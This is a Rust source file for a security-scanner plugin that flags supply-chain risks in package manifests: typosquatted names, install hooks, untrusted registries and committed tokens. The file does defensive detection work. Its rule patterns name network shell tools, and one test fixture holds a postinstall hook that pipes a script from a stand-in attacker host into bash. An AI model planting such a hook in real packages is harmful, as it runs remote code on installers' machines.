use crate::core::{Finding, Severity};
use crate::plugins::traits::{PluginError, PluginReport, ScanContext, ScanPhase, SecurityPlugin};
use async_trait::async_trait;
use lazy_static::lazy_static;
use regex::Regex;
use std::path::Path;
use std::time::Instant;
/// One line-oriented detection rule applied to a manifest or configuration file.
///
/// A rule fires on a line when `regex` matches it and the line is not excused by
/// `allowlist`.
struct ScanPattern {
    // --- How the rule is reported ---
    /// Short finding title.
    title: &'static str,
    /// Longer explanation attached to the finding.
    description: &'static str,
    /// Severity assigned to every finding produced by this rule.
    severity: Severity,

    // --- How the rule matches ---
    /// Expression tested against each individual line of the file.
    regex: Regex,
    /// Trusted hosts / registry names that suppress the finding; an empty slice
    /// means every match is reported.
    allowlist: &'static [&'static str],
}
lazy_static! {
    /// Package names reported as typosquats. Every entry is lowercase; the scanner
    /// lowercases file content before comparing against this list, and the list is
    /// checked for every scanned file regardless of ecosystem.
    static ref TYPOSQUAT_NAMES: Vec<&'static str> = vec![
        // NOTE(review): the grouping below looks like npm / PyPI / RubyGems names,
        // in that order — confirm against the advisories the list was built from.
        "crossenv", "cross-env.js", "d3.js", "gruntcli", "http-proxy.js",
        "jquery.js", "mariadb", "mongose", "mssql.js", "mssql-node",
        "mysqljs", "node-openssl", "node-tkinter",
        "nodecaffe", "nodefabric", "nodeffmpeg", "nodemailer-js",
        "nodemssql", "noderequest", "nodesass", "nodesqlite",
        "shadowsock", "smb", "sqliter", "sqlserver",
        "colourama", "djanga", "easyinstall", "jeilyfish", "libpeshka",
        "mumpy", "nmap-python", "openvc", "pylogging", "python-ftp",
        "python-mongo", "python-mysql", "python3-dateutil", "pythonkafka",
        "requesrs", "requets", "setup-tools", "tenserflow", "urlib3",
        "atlas-client", "rest-client-wrapper",
    ];

    /// Rules for `package.json`, `package-lock.json` and `yarn.lock`.
    static ref NPM_PATTERNS: Vec<ScanPattern> = vec![
        ScanPattern {
            regex: Regex::new(r#"(?i)"(preinstall|postinstall|preuninstall|postuninstall)"\s*:\s*"[^"]*\b(curl|wget|nc|bash|sh|python|node)\b"#).unwrap(),
            title: "Malicious npm lifecycle script",
            severity: Severity::Critical,
            description: "Install hooks executing network commands or shells can download and run malicious code. CWE-829.",
            allowlist: &[],
        },
        ScanPattern {
            regex: Regex::new(r#"(?i)"(preinstall|postinstall)"\s*:\s*"[^"]*""#).unwrap(),
            title: "npm lifecycle hook present",
            severity: Severity::Medium,
            description: "Install lifecycle hooks run automatically during npm install and can execute arbitrary code.",
            allowlist: &[],
        },
        ScanPattern {
            regex: Regex::new(r#"(?i)"registry"\s*:\s*"https?://"#).unwrap(),
            title: "npm custom registry configured",
            severity: Severity::High,
            description: "A non-default npm registry is configured. This could serve malicious package versions.",
            allowlist: &["registry.npmjs.org"],
        },
    ];

    /// Rules for Python manifests (`requirements.txt`, `Pipfile`, `setup.py`, ...).
    static ref PYTHON_PATTERNS: Vec<ScanPattern> = vec![
        ScanPattern {
            // pip accepts both `--index-url URL` and `--index-url=URL`; the
            // separator class covers either form so the `=` spelling cannot be
            // used to slip past the rule.
            regex: Regex::new(r"(?i)--index-url[\s=]+https?://").unwrap(),
            title: "PyPI custom index URL",
            severity: Severity::High,
            description: "A non-default PyPI index is configured. This could serve malicious packages.",
            allowlist: &["pypi.org", "files.pythonhosted.org"],
        },
        ScanPattern {
            // Same separator handling as `--index-url` above.
            regex: Regex::new(r"(?i)--extra-index-url[\s=]+").unwrap(),
            title: "PyPI extra index URL (dependency confusion risk)",
            severity: Severity::High,
            description: "Extra index URLs enable dependency confusion attacks where an attacker publishes a higher version to the public index. CWE-427.",
            allowlist: &[],
        },
        ScanPattern {
            regex: Regex::new(r"(?i)(cmdclass|setup_requires|install_requires).*\b(os\.|subprocess|exec|eval)\b").unwrap(),
            title: "Code execution in setup.py",
            severity: Severity::Critical,
            description: "setup.py executing code during install can compromise the build environment.",
            allowlist: &[],
        },
        ScanPattern {
            regex: Regex::new(r"(?i)dependency_links\s*=\s*\[").unwrap(),
            title: "Python dependency_links (deprecated, insecure)",
            severity: Severity::High,
            description: "dependency_links can point to attacker-controlled URLs and bypass PyPI.",
            allowlist: &[],
        },
    ];

    /// Rules for `Cargo.toml` and `Cargo.lock`.
    static ref CARGO_PATTERNS: Vec<ScanPattern> = vec![
        ScanPattern {
            regex: Regex::new(r"(?i)\[patch\.(crates-io|[^\]]+)\]").unwrap(),
            title: "Cargo patch directive",
            severity: Severity::High,
            description: "Cargo [patch] can silently replace crate sources. Verify this is intentional.",
            allowlist: &[],
        },
        ScanPattern {
            regex: Regex::new(r"(?i)\[replace\]").unwrap(),
            title: "Cargo [replace] directive (deprecated)",
            severity: Severity::High,
            description: "Cargo [replace] substitutes crate sources. This is deprecated and can be used maliciously.",
            allowlist: &[],
        },
        ScanPattern {
            regex: Regex::new(r#"(?i)registry\s*=\s*""#).unwrap(),
            title: "Cargo alternate registry",
            severity: Severity::Medium,
            description: "Non-default Cargo registry configured. Verify the registry is trusted.",
            allowlist: &["github.com", "crates-io", "crates.io"],
        },
        ScanPattern {
            regex: Regex::new(r#"(?i)git\s*=\s*"https?://"#).unwrap(),
            title: "Cargo git dependency from unknown host",
            severity: Severity::High,
            description: "Git dependency from an unrecognized host could serve malicious code.",
            allowlist: &["github.com", "gitlab.com", "bitbucket.org"],
        },
    ];

    /// Rules for `go.mod` and `go.sum`.
    static ref GO_PATTERNS: Vec<ScanPattern> = vec![
        ScanPattern {
            regex: Regex::new(r"(?i)replace\s+\S+\s+=>\s+").unwrap(),
            title: "Go module replace directive",
            severity: Severity::High,
            description: "Go replace directives override module sources. Verify this is not redirecting to a malicious fork.",
            allowlist: &[],
        },
    ];

    /// Rules for `Gemfile` and `Gemfile.lock`.
    static ref GEMFILE_PATTERNS: Vec<ScanPattern> = vec![
        ScanPattern {
            regex: Regex::new(r#"(?i)source\s+['"]https?://"#).unwrap(),
            title: "RubyGems custom source",
            severity: Severity::High,
            description: "Non-default gem source configured. This could serve malicious packages.",
            allowlist: &["rubygems.org"],
        },
        ScanPattern {
            regex: Regex::new(r#"(?i)git:\s*['"]https?://"#).unwrap(),
            title: "RubyGem git source from unknown host",
            severity: Severity::High,
            description: "Git source from an unrecognized host could serve malicious code.",
            allowlist: &["github.com", "gitlab.com", "bitbucket.org"],
        },
    ];

    /// Rules for `.npmrc`.
    static ref NPMRC_PATTERNS: Vec<ScanPattern> = vec![
        ScanPattern {
            regex: Regex::new(r"(?i)registry\s*=\s*https?://").unwrap(),
            title: "npmrc custom registry",
            severity: Severity::High,
            description: "Non-default npm registry configured in .npmrc.",
            allowlist: &["registry.npmjs.org"],
        },
        ScanPattern {
            regex: Regex::new(r"(?i)//([\w.-]+):_authToken\s*=").unwrap(),
            title: "npm registry auth token in .npmrc",
            severity: Severity::Critical,
            description: "Registry authentication token stored in .npmrc. This should not be committed.",
            allowlist: &[],
        },
    ];

    /// Rules for `.pypirc`.
    static ref PYPIRC_PATTERNS: Vec<ScanPattern> = vec![
        ScanPattern {
            regex: Regex::new(r"(?i)repository\s*[:=]\s*https?://").unwrap(),
            title: "PyPI custom repository in .pypirc",
            severity: Severity::High,
            description: "Non-default PyPI repository configured. Could be used to exfiltrate packages.",
            allowlist: &["upload.pypi.org", "test.pypi.org"],
        },
        ScanPattern {
            regex: Regex::new(r"(?i)(password|token)\s*[:=]\s*\S+").unwrap(),
            title: "PyPI credentials in .pypirc",
            severity: Severity::Critical,
            description: "PyPI credentials stored in .pypirc. This should not be committed.",
            allowlist: &[],
        },
    ];
}
/// Security plugin that inspects package manifests, lock files and package-manager
/// configuration for signs of supply chain attacks.
///
/// The scanner is a stateless unit type, so `Default` is derived rather than
/// hand-written; `SupplyChainScanner::default()` yields the same value as before.
#[derive(Debug, Default)]
pub struct SupplyChainScanner;
impl SupplyChainScanner {
    /// Creates a scanner. The type holds no state.
    pub fn new() -> Self {
        Self
    }

    /// Returns the final component of `path` as UTF-8, or `""` when the path has no
    /// file name or the name is not valid UTF-8.
    fn file_name(path: &Path) -> &str {
        path.file_name().and_then(|n| n.to_str()).unwrap_or("")
    }

    /// Returns `true` when `path` names a manifest, lock file or package-manager
    /// configuration file that this plugin inspects. The comparison is an exact,
    /// case-sensitive match on the file name only.
    fn is_supply_chain_file(path: &Path) -> bool {
        matches!(
            Self::file_name(path),
            "package.json"
                | "package-lock.json"
                | "yarn.lock"
                | "requirements.txt"
                | "Pipfile"
                | "Pipfile.lock"
                | "setup.py"
                | "setup.cfg"
                | "pyproject.toml"
                | "Cargo.toml"
                | "Cargo.lock"
                | "go.mod"
                | "go.sum"
                | "Gemfile"
                | "Gemfile.lock"
                | ".npmrc"
                | ".pypirc"
                | "pom.xml"
                | "build.gradle"
                | "build.gradle.kts"
        )
    }

    /// Maps the file name of `path` to the rule set that applies to it.
    ///
    /// Files accepted by [`Self::is_supply_chain_file`] that have no dedicated rule
    /// set (`pom.xml`, `build.gradle`, `build.gradle.kts`) map to
    /// `SupplyChainFileType::Other` and only receive the typosquat check.
    fn detect_file_type(path: &Path) -> SupplyChainFileType {
        match Self::file_name(path) {
            "package.json" | "package-lock.json" | "yarn.lock" => SupplyChainFileType::Npm,
            "requirements.txt" | "Pipfile" | "Pipfile.lock" | "setup.py" | "setup.cfg"
            | "pyproject.toml" => SupplyChainFileType::Python,
            "Cargo.toml" | "Cargo.lock" => SupplyChainFileType::Cargo,
            "go.mod" | "go.sum" => SupplyChainFileType::Go,
            "Gemfile" | "Gemfile.lock" => SupplyChainFileType::Ruby,
            ".npmrc" => SupplyChainFileType::Npmrc,
            ".pypirc" => SupplyChainFileType::Pypirc,
            _ => SupplyChainFileType::Other,
        }
    }

    /// Returns `true` for characters that can belong to a package name. Anything
    /// else (quotes, `/`, `@`, `=`, whitespace, ...) delimits a name.
    fn is_package_name_char(c: char) -> bool {
        c.is_alphanumeric() || matches!(c, '-' | '_' | '.')
    }

    /// Returns the byte offset of the first occurrence of `name` in `haystack` that
    /// is not embedded in a longer package-name-like token, or `None`.
    ///
    /// A plain substring search would report `smb` inside `node-smb2` or inside an
    /// integrity hash; requiring a delimiter (or the start/end of the text) on both
    /// sides limits matches to the package name itself.
    fn find_package_name(haystack: &str, name: &str) -> Option<usize> {
        haystack
            .match_indices(name)
            .map(|(start, _)| start)
            .find(|&start| {
                let end = start + name.len();
                let clear_before = haystack[..start]
                    .chars()
                    .next_back()
                    .map_or(true, |c| !Self::is_package_name_char(c));
                let clear_after = haystack[end..]
                    .chars()
                    .next()
                    .map_or(true, |c| !Self::is_package_name_char(c));
                clear_before && clear_after
            })
    }

    /// Reports every entry of `TYPOSQUAT_NAMES` that appears in `content` as a
    /// standalone package name (case-insensitive).
    ///
    /// At most one finding is produced per name; it carries the 1-based line of the
    /// first occurrence. Finding ids are `SC-TYPO-001`, `SC-TYPO-002`, ... in list
    /// order.
    fn check_typosquats(path: &Path, content: &str) -> Vec<Finding> {
        let mut findings = Vec::new();
        // Lowercased once; the names in the list are already lowercase.
        let content_lower = content.to_lowercase();
        for &name in TYPOSQUAT_NAMES.iter() {
            if let Some(offset) = Self::find_package_name(&content_lower, name) {
                // Lowercasing never adds or removes '\n', so counting newlines in
                // the lowered text gives the line number in the original file.
                let line = content_lower[..offset].matches('\n').count() + 1;
                findings.push(
                    Finding::new(
                        format!("SC-TYPO-{:03}", findings.len() + 1),
                        format!("Known typosquatted package: {}", name),
                        Severity::Critical,
                    )
                    .with_file(path.to_path_buf())
                    .with_line(line as u32)
                    .with_evidence(name.to_string())
                    .with_description(format!(
                        "'{}' is a known typosquatted package name used in supply chain attacks. \
                         Verify this is the intended dependency. CWE-829.",
                        name
                    )),
                );
            }
        }
        findings
    }

    /// Extracts the host (or bare registry name) from the text that immediately
    /// follows a rule match.
    ///
    /// `scheme_consumed` tells whether the rule's own match already ended with
    /// `://`; when it did not, one leading `scheme://` prefix is skipped. The value
    /// is cut at the first quote or whitespace, the authority at the first
    /// `/`, `\`, `?` or `#`, and any `userinfo@` prefix and `:port` suffix are
    /// dropped, so `user@evil.com:8080/x` yields `evil.com`.
    fn target_host(rest: &str, scheme_consumed: bool) -> &str {
        let value_end = rest
            .find(|c: char| c.is_whitespace() || c == '"' || c == '\'')
            .unwrap_or(rest.len());
        let mut value = &rest[..value_end];

        if !scheme_consumed {
            if let Some(idx) = value.find("://") {
                let scheme = &value[..idx];
                // Only treat the prefix as a scheme when it is made of scheme
                // characters; otherwise the "://" belongs to a path or query.
                let looks_like_scheme = !scheme.is_empty()
                    && scheme
                        .chars()
                        .all(|c| c.is_ascii_alphanumeric() || matches!(c, '+' | '-' | '.'));
                if looks_like_scheme {
                    value = &value[idx + 3..];
                }
            }
        }

        let authority_end = value
            .find(|c: char| matches!(c, '/' | '\\' | '?' | '#'))
            .unwrap_or(value.len());
        let authority = &value[..authority_end];
        let host_port = authority.rsplit('@').next().unwrap_or(authority);
        let host = host_port.split(':').next().unwrap_or(host_port);
        host.trim_end_matches('.')
    }

    /// Returns `true` when `host` equals an allowlist entry or is a subdomain of
    /// one (ASCII case-insensitive). Allowlist entries are expected in lowercase.
    fn host_is_allowlisted(host: &str, allowlist: &[&str]) -> bool {
        let host = host.to_ascii_lowercase();
        allowlist.iter().any(|allowed| {
            host == *allowed
                || host
                    .strip_suffix(*allowed)
                    .map_or(false, |prefix| prefix.ends_with('.'))
        })
    }

    /// Applies `patterns` to every line of `content`, appending one finding per
    /// (line, pattern) pair that fires.
    ///
    /// For a pattern with an allowlist, each match on the line is examined and the
    /// pattern fires when at least one matched target has a host outside the
    /// allowlist. Comparing the host — rather than searching the whole line for an
    /// allowlisted string — prevents bypasses such as
    /// `https://evil.example/?registry.npmjs.org` or
    /// `https://pypi.org@evil.example/`, and stops an allowlisted URL elsewhere on a
    /// minified line from hiding an untrusted one.
    ///
    /// Finding ids are `SC-NNN`, numbered from the current length of `findings`.
    fn apply_patterns(
        path: &Path,
        content: &str,
        patterns: &[ScanPattern],
        findings: &mut Vec<Finding>,
    ) {
        for (line_num, line) in content.lines().enumerate() {
            for sp in patterns {
                let fires = if sp.allowlist.is_empty() {
                    sp.regex.is_match(line)
                } else {
                    sp.regex.find_iter(line).any(|m| {
                        let scheme_consumed = m.as_str().ends_with("://");
                        let host = Self::target_host(&line[m.end()..], scheme_consumed);
                        !Self::host_is_allowlisted(host, sp.allowlist)
                    })
                };
                if !fires {
                    continue;
                }
                findings.push(
                    Finding::new(
                        format!("SC-{:03}", findings.len() + 1),
                        sp.title.to_string(),
                        sp.severity,
                    )
                    .with_file(path.to_path_buf())
                    .with_line((line_num + 1) as u32)
                    .with_evidence(line.trim().to_string())
                    .with_description(sp.description.to_string()),
                );
            }
        }
    }

    /// Scans one file's text: the typosquat check always runs, followed by the rule
    /// set selected by the file name (none for `SupplyChainFileType::Other`).
    fn scan_content(path: &Path, content: &str) -> Vec<Finding> {
        let mut findings = Vec::new();
        let file_type = Self::detect_file_type(path);
        findings.extend(Self::check_typosquats(path, content));
        let patterns: &[ScanPattern] = match file_type {
            SupplyChainFileType::Npm => &NPM_PATTERNS,
            SupplyChainFileType::Python => &PYTHON_PATTERNS,
            SupplyChainFileType::Cargo => &CARGO_PATTERNS,
            SupplyChainFileType::Go => &GO_PATTERNS,
            SupplyChainFileType::Ruby => &GEMFILE_PATTERNS,
            SupplyChainFileType::Npmrc => &NPMRC_PATTERNS,
            SupplyChainFileType::Pypirc => &PYPIRC_PATTERNS,
            SupplyChainFileType::Other => return findings,
        };
        Self::apply_patterns(path, content, patterns, &mut findings);
        findings
    }
}
/// Which rule set applies to a scanned file, derived from its file name.
///
/// The enum is a fieldless tag that is passed around by value, so it derives
/// `Clone`/`Copy` and equality in addition to `Debug`.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum SupplyChainFileType {
    /// `package.json`, `package-lock.json`, `yarn.lock`.
    Npm,
    /// `requirements.txt`, `Pipfile`, `Pipfile.lock`, `setup.py`, `setup.cfg`,
    /// `pyproject.toml`.
    Python,
    /// `Cargo.toml`, `Cargo.lock`.
    Cargo,
    /// `go.mod`, `go.sum`.
    Go,
    /// `Gemfile`, `Gemfile.lock`.
    Ruby,
    /// `.npmrc`.
    Npmrc,
    /// `.pypirc`.
    Pypirc,
    /// Any other file name; no ecosystem-specific rules apply.
    Other,
}
/// Plugin-framework integration for the supply chain scanner.
#[async_trait]
impl SecurityPlugin for SupplyChainScanner {
    /// Stable plugin identifier; also used as the report's plugin name.
    fn name(&self) -> &str {
        "supply-chain"
    }

    /// Plugin version string.
    fn version(&self) -> &str {
        "0.1.0"
    }

    /// One-line, human-readable summary of what the plugin looks for.
    fn description(&self) -> &str {
        "Detect supply chain attacks in package manifests and lock files"
    }

    /// The plugin declares itself for `ScanPhase::All`.
    fn scan_phase(&self) -> ScanPhase {
        ScanPhase::All
    }

    /// Nothing to set up; always succeeds.
    async fn initialize(&mut self) -> Result<(), PluginError> {
        Ok(())
    }

    /// Scans the file described by `context`.
    ///
    /// Findings are produced only when the file name is a recognised supply chain
    /// file and the context carries content; in that case `scanned_files` is set
    /// to 1. Content is decoded as UTF-8 with invalid sequences replaced. The
    /// elapsed time is always recorded in `duration_ms`, and the call never
    /// returns `Err`.
    async fn scan(&self, context: &ScanContext<'_>) -> Result<PluginReport, PluginError> {
        let timer = Instant::now();
        let mut report = PluginReport::new(self.name().to_string());

        if Self::is_supply_chain_file(context.path) {
            if let Some(raw) = context.file_content {
                let text = String::from_utf8_lossy(raw);
                report.findings = Self::scan_content(context.path, &text);
                report.scanned_files = 1;
            }
        }

        report.duration_ms = timer.elapsed().as_millis() as u64;
        Ok(report)
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    use crate::plugins::traits::ScanContext;
    use std::collections::HashMap;

    /// Runs a fresh scanner over `content` as if it were a file named `file_name`
    /// in the post-extract phase, and returns the resulting report.
    async fn scan_as(file_name: &str, content: &[u8]) -> PluginReport {
        let context = ScanContext {
            path: Path::new(file_name),
            scan_phase: ScanPhase::PostExtract,
            file_content: Some(content),
            metadata: HashMap::new(),
        };
        SupplyChainScanner::new().scan(&context).await.unwrap()
    }

    /// A dependency on a listed typosquat name is reported.
    #[tokio::test]
    async fn test_typosquat_detection() {
        let report = scan_as(
            "package.json",
            br#"{"dependencies": {"crossenv": "^1.0.0"}}"#,
        )
        .await;

        assert!(!report.findings.is_empty());
        let has_typosquat = report
            .findings
            .iter()
            .any(|f| f.title.contains("typosquatted"));
        assert!(has_typosquat);
    }

    /// A postinstall hook piping curl into bash is reported as critical.
    #[tokio::test]
    async fn test_npm_postinstall_hook() {
        let report = scan_as(
            "package.json",
            br#"{"scripts": {"postinstall": "curl https://evil.com/backdoor.sh | bash"}}"#,
        )
        .await;

        let has_critical = report
            .findings
            .iter()
            .any(|f| f.severity == Severity::Critical);
        assert!(has_critical);
    }

    /// A `replace` directive in go.mod produces at least one finding.
    #[tokio::test]
    async fn test_go_replace_directive() {
        let report = scan_as(
            "go.mod",
            b"replace github.com/real/pkg => github.com/evil/pkg v1.0.0",
        )
        .await;

        assert!(!report.findings.is_empty());
    }

    /// A registry on an unknown host is reported.
    #[tokio::test]
    async fn test_custom_registry_flagged() {
        let report = scan_as(
            "package.json",
            br#"{"registry": "https://evil-registry.com/npm/"}"#,
        )
        .await;

        let has_registry_finding = report.findings.iter().any(|f| f.title.contains("registry"));
        assert!(has_registry_finding);
    }

    /// The official npm registry does not produce a registry finding.
    #[tokio::test]
    async fn test_official_registry_allowed() {
        let report = scan_as(
            "package.json",
            br#"{"registry": "https://registry.npmjs.org/"}"#,
        )
        .await;

        let has_registry_finding = report.findings.iter().any(|f| f.title.contains("registry"));
        assert!(!has_registry_finding);
    }

    /// Files that are not manifests are ignored even if they contain trigger words.
    #[tokio::test]
    async fn test_non_supply_chain_file_skipped() {
        let report = scan_as("README.md", b"crossenv replace postinstall").await;

        assert!(report.findings.is_empty());
    }
}